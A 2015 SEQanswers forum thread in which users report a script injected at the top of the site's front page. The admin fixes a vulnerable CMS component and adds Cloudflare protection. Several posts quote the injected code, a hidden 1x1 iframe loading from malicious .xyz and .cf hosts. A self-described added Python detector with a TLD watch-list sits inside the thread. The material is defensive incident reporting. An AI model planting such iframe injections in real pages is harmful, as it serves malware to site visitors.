SEQanswers

[#1] 07-09-2015, 07:04 AM - Richard Finney (Senior Member, bethesda; joined Feb 2009, 694 posts)
Thread title: script injection: seqanswers security Q?

Just checking on this.

Is this legit? If it's not, are others seeing this too?

When I load seqanswers.com, the first HTML is a request for a script from
http://xrrkp.yourrevolution.xyz:9449

Example:
Code:
<script>document.write("<iframe width='1' height='1' src='http://xrrkp.yourrevolution.xyz:9449/mirror.shtml?boom=78825&foul=ashamed&close=9014&listen=49237&peril=queer&snarl=encourage&monday=60544&quiver=86886&build=42380' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />

<title>SEQanswers Home </title>

This is blocked by my local antivirus software.

The domain http://www.domainiq.com/domain?yourrevolution.xyz was registered 9 hours ago.

Is there something fishy going on?
___
Edit:

Now it is trying to load from http://pkpgk.yourspin.xyz:32551
Is anybody else getting this? According to http://www.domainiq.com/domain?yourspin.xyz, Max Vlapet registered it 10 hours ago.

____

I know ad companies use pop-up domains to bypass adblockers, but this looks very fishy.

Can others "view source" on seqanswers and confirm whether this is specific to seqanswers.com? Just check the first lines of text.

I am getting this on both Chrome and Mozilla.

Traceroute is ...
Code:
traceroute 46.108.156.159
traceroute to 46.108.156.159 (46.108.156.159), 30 hops max, 60 byte packets
(first 8 internal to my site removed)
9 66-192-62-13.static.twtelecom.net (66.192.62.13) 4.129 ms 4.642 ms 4.623 ms
10 35.248.2.162 (35.248.2.162) 15.903 ms 15.884 ms 15.748 ms
11 xe-0.equinix.asbnva01.us.bb.gin.ntt.net (206.126.236.12) 5.522 ms 5.877 ms 5.051 ms
12 ae-2.r22.asbnva02.us.bb.gin.ntt.net (129.250.5.136) 5.045 ms 5.312 ms 4.661 ms
13 ae-4.r20.frnkge04.de.bb.gin.ntt.net (129.250.3.21) 92.425 ms 95.965 ms 90.690 ms
14 ae-2.r02.frnkge04.de.bb.gin.ntt.net (129.250.3.94) 133.892 ms 145.722 ms ae-3.r03.frnkge03.de.bb.gin.ntt.net (129.250.6.249) 130.568 ms
15 ae-4.r00.buchro01.ro.bb.gin.ntt.net (129.250.3.79) 126.092 ms 129.742 ms 124.872 ms
16 te5-6-600-bb1.buc1.ro.m247.ro (83.217.231.94) 120.913 ms 132.615 ms 118.762 ms
17 * * *
18 no-rdns.indicii.ro (46.108.156.159) 133.803 ms 129.671 ms 128.985 ms
____
Edit: others at my site are getting it, too.

Last edited by Richard Finney; 07-09-2015 at 07:25 AM.

[#2] 07-09-2015, 07:33 AM - Brian Bushnell (Super Moderator, Walnut Creek, CA; joined Jan 2014, 2,707 posts)

Code:
<script>document.write("<iframe width='1' height='1' src='http://gcqwgonvjv.your-trend.xyz:48310/punish/74636/alter/wonderful/load/79852/chuckle/another/date/33701/arrange/562/sugar/67761/matter/49098/find/33964/tidings/hush/opportunity/39426/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

	<meta http-equiv="Cache-Control" content="no-cache" />
	<meta http-equiv="Pragma" content="no-cache" />
	<meta http-equiv="Expires" content="0" />


<title>SEQanswers Home </title>

[#3] 07-09-2015, 07:36 AM - Richard Finney (Senior Member, bethesda; joined Feb 2009, 694 posts)

your-trend.xyz is the same server (in Romania)?

So it's not some local injection.

Whois reports the domain as:

Email: associated with ~46 domains (Reverse Whois)
Registrant Org: Max Vlapet is associated with ~40 other domains
Dates: Created on 2015-07-09 - Expires on 2016-07-09 - Updated on 2015-07-09
Whois Server: whois.nic.xyz
Website Title: None given.

Whois Record (last updated on 2015-07-09):
Domain Name: YOUR-TREND.XYZ
Domain ID: D8789917-CNIC
WHOIS Server: whois.alpnames.com
Referral URL: http://www.alpnames.com
Updated Date: 2015-07-09T14:14:47.0Z
Creation Date: 2015-07-09T14:14:46.0Z
Registry Expiry Date: 2016-07-09T23:59:59.0Z
Sponsoring Registrar: AlpNames Limited
Sponsoring Registrar IANA ID: 1857
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registrant ID: ALP_44867689
Registrant Name: Max Vlapet
Registrant Organization: N/A
Registrant Street: Mausoleum str, pl.13
Registrant City: Moscow
Registrant State/Province: Moscow
Registrant Postal Code: 123006
Registrant Country: RU
Registrant Phone: +7.4959826524
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email:
Name Server: NS2.YOUR-TREND.XYZ
Name Server: NS1.YOUR-TREND.XYZ
DNSSEC: unsigned

[#4] 07-10-2015, 06:56 AM - Richard Finney (Senior Member, bethesda; joined Feb 2009, 694 posts)

Load the SEQanswers front page.
View the source.

Note the PHISH(?) injection at the top?

I got this just now ...
Code:
<script>document.write("<iframe width='1' height='1' src='http://yuarzwpcf.yqxjoksljg.cf:9654/slip/49615/peculiar/curiosity/embarrass/15638/brandy/wife/disgust/80297/' scrolling='' frameborder='0'></iframe>")</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />

<title>SEQanswers Home </title>

It's also loading from gvfwytmdxobu.tk; tk is not a supported top-level domain, according to http://whois.icann.org/en/lookup?name=yqxjoksljg.cf ????

https://en.wikipedia.org/wiki/.tk#Abuse

Last edited by Richard Finney; 07-10-2015 at 07:11 AM.
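The check the posts in this thread perform by hand (view source, look at what comes before the doctype), as an added example in Python that is not code from the thread or from SEQanswers: it reads a raw HTML body, isolates anything ahead of `<!DOCTYPE>`, and flags a script-written 1x1 iframe that points at an off-site host. The sample HTML is constructed from the snippet quoted above; `site_host`, `WATCH_TLDS` and the function names are assumptions of this example, and the TLD list just reflects the TLDs seen in this thread.

```python
import re
from urllib.parse import urlparse

# Constructed sample, assembled from the snippet quoted in this post: the
# injected script sits *before* the doctype, then the real page begins.
SAMPLE_INJECTED = (
    "<script>document.write(\"<iframe width='1' height='1' "
    "src='http://yuarzwpcf.yqxjoksljg.cf:9654/slip/49615/peculiar/' "
    "scrolling='' frameborder='0'></iframe>\")</script>"
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\n'
    '<html dir="ltr" lang="en"><head><title>SEQanswers Home </title>'
)
# Constructed clean page start for comparison.
SAMPLE_CLEAN = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">\n<html>'

# TLDs of the injected hosts reported in this thread (assumed watch-list).
WATCH_TLDS = {"xyz", "cf", "tk", "ml"}

IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.I)
HIDDEN_1X1 = re.compile(r"<iframe[^>]*\bwidth=['\"]?1\b[^>]*\bheight=['\"]?1\b", re.I)


def find_injection(html, site_host="seqanswers.com"):
    """Return one finding per iframe src written by script *before* the doctype.

    A well-formed page starts with <!DOCTYPE>; content ahead of it was not
    produced by the template, so it is the first place to look. Run this on
    the raw HTTP body (curl/requests), not on a browser's DOM: in the browser
    document.write has already executed and the script tag is gone."""
    idx = html.lower().find("<!doctype")
    prefix = html if idx < 0 else html[:idx]
    if "<script" not in prefix.lower():
        return []
    findings = []
    for url in IFRAME_SRC.findall(prefix):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        tld = host.rsplit(".", 1)[-1] if "." in host else ""
        on_site = host == site_host or host.endswith("." + site_host)
        findings.append({
            "host": host,
            "port": parsed.port,
            "off_site": not on_site,          # hidden frame to a foreign host
            "hidden_1x1": bool(HIDDEN_1X1.search(prefix)),
            "watch_tld": tld in WATCH_TLDS,
        })
    return findings


def is_injected(html, site_host="seqanswers.com"):
    """True when any pre-doctype frame is hidden and points off-site."""
    return any(f["off_site"] and f["hidden_1x1"] for f in find_injection(html, site_host))
```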

[#5] 07-10-2015, 08:18 AM - GenoMax (Senior Member, East Coast USA; joined Feb 2008, 6,761 posts)

Can you PM ECO about this?

[#6] 07-10-2015, 08:24 AM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

On it. Thanks guys.

[#7] 07-10-2015, 03:03 PM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

Whew. Pretty easy cleanup. Culprit was an old ad server.

Forums have been upgraded and using a new adserver that is (at least for now) free of exploits.

Please verify that you're not seeing the previous problems, and let me know asap if you see any other weirdness.

Sorry about that all!

[#8] 07-10-2015, 03:44 PM - Richard Finney (Senior Member, bethesda; joined Feb 2009, 694 posts)

I'm not seeing the injected script.

[#9] 07-10-2015, 05:00 PM - Brian Bushnell (Super Moderator, Walnut Creek, CA; joined Jan 2014, 2,707 posts)

Thanks for fixing this quickly!

[#10] 07-17-2015, 06:49 AM - Richard Finney (Senior Member, bethesda; joined Feb 2009, 694 posts)

Script injection is happening again. Fri Jul 17 10:49:19 EDT 2015

This time it's ...
zosnoeem.lzokxrvrcmtprgesy.ml

http://whois.domaintools.com/lzokxrvrcmtprgesy.ml

[#11] 07-17-2015, 06:54 AM - GenoMax (Senior Member, East Coast USA; joined Feb 2008, 6,761 posts)

I have let ECO know.

[#12] 07-17-2015, 07:12 AM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

Got it again. Turns out it wasn't the ad server. Not going to say what it is for now.

[#13] 07-17-2015, 07:13 AM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

Flood attacks whenever it happens...


[#14] 07-17-2015, 08:04 AM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

Upping the security level of cloudflare to prevent it again until I can upgrade the vulnerable component. Apologies for the 5 second delay.

[#15] 07-17-2015, 10:10 AM - ECO (Site Admin, SF Bay Area, CA, USA; joined Oct 2007, 1,355 posts)

Thanks to Richard Finney for notification and GenoMax for his rapid locating of both 1.) me and 2.) the likely exploit.

The version of the front page CMS I'm using had an exploit, which I have upgraded.

I'm going to leave the CloudFlare security challenge on through the weekend to stop further DDoS/overload attacks. I welcome feedback on how annoying it is.

[#16] 07-18-2015, 06:37 PM - Brian Bushnell (Super Moderator, Walnut Creek, CA; joined Jan 2014, 2,707 posts)

It's not annoying to me. A few seconds the first time you load the page in some number of hours, and subsequently, no delay. Even the first time, it still loads faster than typical pages with animated content or animated ads.

[#17] 07-18-2015, 06:39 PM - SNPsaurus (Registered Vendor, Eugene, OR; joined May 2013, 442 posts)

I'm just afraid that I check SeqAnswers so often that I'll be mistaken for a DDoS attack.
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.